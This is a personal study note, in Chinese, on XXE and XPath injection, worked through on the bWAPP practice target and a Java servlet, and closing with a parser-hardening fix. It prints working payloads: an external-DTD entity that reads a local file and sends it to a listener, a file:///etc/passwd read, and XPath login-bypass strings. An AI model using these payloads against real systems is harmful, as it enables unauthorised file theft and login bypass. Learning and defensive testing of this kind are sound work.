少年击剑更吹箫，剑气箫心一例消。这篇文章主要讲述XXE外部实体注入（XML External Entity Injection）学习笔记相关的知识，希望能为你提供帮助。
        说明：这篇笔记记录了我学习XXE外部实体注入相关的知识，包括基础知识以及后面的实例，里面还掺杂了最早学习xml注入的一些笔记，可能显得有些乱。最早学习的时候是基于php语言写的BWAPP靶机做的实验学习，最近又在学习java代码审计，因此对当时的笔记进行了补充。部分笔记都来源于网络，另外结合自己的理解对java测试代码进行了补充修改，通过对代码的修复加深对XXE攻击的理解。另外强调一下，本文记录仅用于学习，提高应用程序安全性，请勿恶意使用！有不正确的地方也请大家指出修正。一、基础知识
XML /DTD的知识参见：??http://www.runoob.com/dtd/dtd-intro.html??
需要注意几个概念：
XML：可扩展标记语言，用于数据存储和传输，而html用于数据展现
DTD：文档类型定义，描述了文档的结构及其字段含义，DTD可以在XML文档内部声明，也可以在外部引用。下面是一个比较典型的示例：
< ?xml version=”1.0” ?>
< !DOCTYPE note [
< !ELEMENT note
(to,from,heading,body)>
< !ELEMENT to (#PCDATA)>
< !ELEMENT from (#PCDATA)>
< !ELEMENT heading (#PCDATA)>
< !ELEMENT body (#PCDATA)>
]>
< note>
< to> George< /to>
< from> John< /from>
< heading> Reminder< /heading>
< body> Don’t forget the
meeting!< /body>
< /note>

PCDATA：Parsed Character Data，意为被解析的字符数据。
CDATA：Character Data ，意为字符数据，解析器不进行解析的文本。当文本中包含”< ”和”& ”时，在XML中是非法的，会产生错误，因此可以使用CDATA进行修饰，格式如下：
< ![CDATA[
                                被解析器忽略的字符
]]>
DTD实体：用于定义引用普通文本或者特殊字符的快捷方式的一个变量，可以在内部声明，也可以外部引用。
XML参数实体：普通实体引用以& 开头，以; 结尾；参数实体定义的时候以%表示，引用也以%开头，以; 结尾。参数实体只能在DTD中定义及引用，而普通实体在XML文档中使用。如下面这一段：
< ?xml version="1.0"
encoding="UTF-8" ?>
< !DOCTYPE a[
< !ENTITY % dtd SYSTEM
"http://127.0.0.1:8888/evil.dtd">
%dtd;
]>
< user> < username> & bbbb; < /username> < password> admin< /password> < /user>
evil.dtd文件内容：
< !ENTITY % aaaa SYSTEM
"file:///e:/test.txt">
< !ENTITY % demo "< !ENTITY bbbb
SYSTEM http://127.0.0.1:9999/xxe?file=%aaaa; > ">
%demo;
当用户输入的数据以xml的格式发送给服务器处理，而用户可以控制输入的数据，并且允许引用外部实体时，就有可能产生XXE注入漏洞。


二、PHP代码测试实例
（一）使用bwapp靶机进行测试
基于PHP的靶机比较多，比如DVWA、Bwapp等，网上要以自行下载。
当允许引用外部实体时，通过构造恶意内容可导致读取任意文件，下面是正常访问的截包：
获取报文后，插入恶意的内容：
< ?xml version=”1.0”
encoding=”UTF-8”?>
< !DOCTYPE a[
< !ENTITY b SYSTEM
“file:///etc/passwd”>
]>
将实体b带入到用户输入中，修改后的截包：

备注：上面的实验没有成功，始终报错。
修改后不报错，但是没有达到效果：看到返回bee’s secret has been reset就可以了，可以通过查看数据库，secret是否有被修改。
下面的方法也可以：

关键代码：$login 必须存在，上面是通过& b; 去调用实体。
（二）XML/XPATH 注入漏洞，表单登录
判断漏洞类型：登录界面和采用数据库一样，只是查询数据的时候不是从数据库中查询，而是从XML文档中去查询。
根据报错信息判断为XML。


万能密码：
admin or 1=1

未知用户名：
用户名：x or 1 or 1
密码：随意



闭合XML标签：
用户名：] | //*|//*[
密码：随意，可以不填

在密码处绕过登录：
密码：1 or 1=1 
（三）XML/XPATH 注入：search
genre=horror)]|//*|//*[(
通过尝试各种方式都不成功，查看源代码，这里使用了contains函数，该函数在中括号中调用：
$result =
$xml-> xpath("//hero[contains(genre, $genre)]/movie");
需要去闭合圆括号以及中括号。
genre=horror)]|//*|//*[(
或者：genre=)]|//*|//*[(
三、Java代码测试实例              这是由Jsp和Servlet构成的测试代码，代码根据B站老师讲解的内容??https://www.bilibili.com/video/BV1av411H7K4??调试而来。
              前端页面为loginxml.jsp，获取用户输入的用户名密码，然后组合成为xml格式的文本，并且传输给LoginServletXml.java进行处理，该段代码使用@WebServlet(“doLoginServlet”进行注解。当用户输入用户名为admin，密码为admin时，后台返回code为1，msg为用户名，如下：
（一）    普通注入方式
我在E盘放了一个测试文件test.txt，内容为“this is a test，现在插入恶意数据读取该内容：
< ?xml version="1.0"
encoding="UTF-8" ?>
< !DOCTYPE a[
< !ENTITY b SYSTEM
"file:///e:/test.txt">
]>
< user> < username> & b; < /username> < password> admin< /password> < /user>
修复方式：

dbf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD,"");

dbf.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA,"");